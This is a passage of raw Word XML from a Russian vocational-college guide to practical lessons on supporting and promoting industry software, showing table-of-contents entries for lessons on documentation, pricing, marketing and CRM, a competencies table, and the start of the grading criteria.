        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 23 Составление пользовательской документации к программному продукту</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278742 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>155</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3" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 24 Оценка качества отраслевого программного обеспечения</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278743 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>159</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4" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 25 Определение эффективности использования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_Toc26278744 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>162</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5" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 26 Разработка рекомендаций по эффективному использованию ПО</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278745 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>165</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6" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 27 Анализ ценообразования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_Toc26278746 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>167</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7" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 40 Выбор эффективной технологии продвижения программного обеспечения на рынок информационных услуг</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278747 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>173</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8" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 29 Создание макета электронного баннера компании для продвижения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_Toc26278748 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>178</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49" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 30 Создание макета презентации отраслевого программного обеспечения</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278749 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>185</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0" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 31 Разработка проекта электронной выставки отраслевого программного обеспечения</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278750 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>189</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1" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 32 Разработка проекта покупательской конференции программного обеспечения отраслевой направленности</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278751 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>192</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2" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 33 Разработка сайта для продвижения программного обеспечения отраслевой направленности (4 часов)</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278752 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>195</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3" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 34 Освоение техники управления контактами и клиентской базой в CRM-системе</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278753 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>197</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4" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 35 Создание базы данных клиентов средствами системы CRM</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278754 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>199</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5" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 36 Разработка анкеты для интервьюирования клиентов</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278755 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>201</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6" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 37 Формирование статистических и аналитических отчетов по продажам</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278756 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>202</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7" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 38 Реализация информационной поддержки интернет-магазина компании</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278757 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>203</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8" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 39 Разработка системы собственных взаимоотношений с клиентами</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278758 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>204</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59" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 40 Освоение техники управления мобильными продажами (с корпоративного персонального компьютера (КПК), ноутбука или удаленный доступ) в CRM-системе</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278759 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>206</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRDefault="00B56D78">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc26278760" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Перечень рекомендуемых источников</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278760 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>208</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0091628F" w:rsidRPr="00607C3B" w:rsidRDefault="00B56D78" w:rsidP="00F20E5F">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Toc507786841"/>
      <w:bookmarkStart w:id="13" w:name="_Toc507788232"/>
      <w:bookmarkStart w:id="14" w:name="_Toc507788502"/>
    </w:p>
    <w:p w:rsidR="0091628F" w:rsidRPr="00607C3B" w:rsidRDefault="0091628F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00607C3B" w:rsidRDefault="00E115DD" w:rsidP="00F20E5F">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc26278718"/>
      <w:r w:rsidRPr="00607C3B">
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00E115DD" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Методические указания по выполнению практических заданий разработаны в соответствии с рабочей программой ПМ.03. Сопровождение и продвижение программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidR="00AA61B4" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> специальности 230701 Прикладная информатика (по отраслям)</w:t>
      </w:r>
      <w:r w:rsidR="00E115DD" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и предназначены для приобретения практических навыков </w:t>
      </w:r>
      <w:r w:rsidR="00E115DD" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в части освоения основного вида профессиональной деятельности (ВПД): Сопровождение и продвижение программного обеспечения отраслевой направленности и соответствующих профессиональных (ПК) и общих (ОК) компетенций:</w:t>
      </w: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4"/>
        <w:gridCol w:w="8313"/>
      </w:tblGrid>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ПК 3.1</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Разрешать проблемы совместимости программного обеспечения отраслевой направленности</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ПК 3.2</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Осуществлять продвижение и презентацию программного обеспечения отраслевой направленности</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ПК 3.3</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Проводить обслуживание, тестовые проверки, настройку программного обеспечения отраслевой направленности.</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ПК 3.4</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Работать с системами управления взаимоотношениями с клиентами.</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ОК 1</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Понимать сущность и социальную значимость своей будущей профессии, проявлять к ней устойчивый интерес.</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ОК 2</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Организовывать собственную деятельность, определять методы и способы выполнения профессиональных задач, оценивать их эффективность и качество.</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ОК 3</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Принимать решения в стандартных и нестандартных ситуациях и нести за них ответственность.</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ОК 4</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Осуществлять поиск, анализ и оценку информации, необходимой для постановки и решения профессиональных задач, профессионального и личностного развития.</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ОК 5</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Использовать информационно-коммуникационные технологии в профессиональной деятельности.</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ОК 6</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Работать в коллективе и команде, эффективно общаться с коллегами, руководством, потребителями.</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ОК 7</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Брать на себя ответственность за работу членов команды (подчиненных), результат выполнения заданий.</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ОК 8</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r>
      <w:tr w:rsidR="00E115DD" w:rsidRPr="00617AC0" w:rsidTr="00EF1B50">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="619"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ОК 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E115DD" w:rsidRPr="00617AC0" w:rsidRDefault="00E115DD" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>Ориентироваться в условиях частой смены технологий в профессиональной деятельности.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Критерии оценки выполнения индивидуальных практических заданий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценка </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>отлично</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выставляется, если выполнено 95-100% объема работы. Возможные недочеты: выполнение задания с задержкой времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
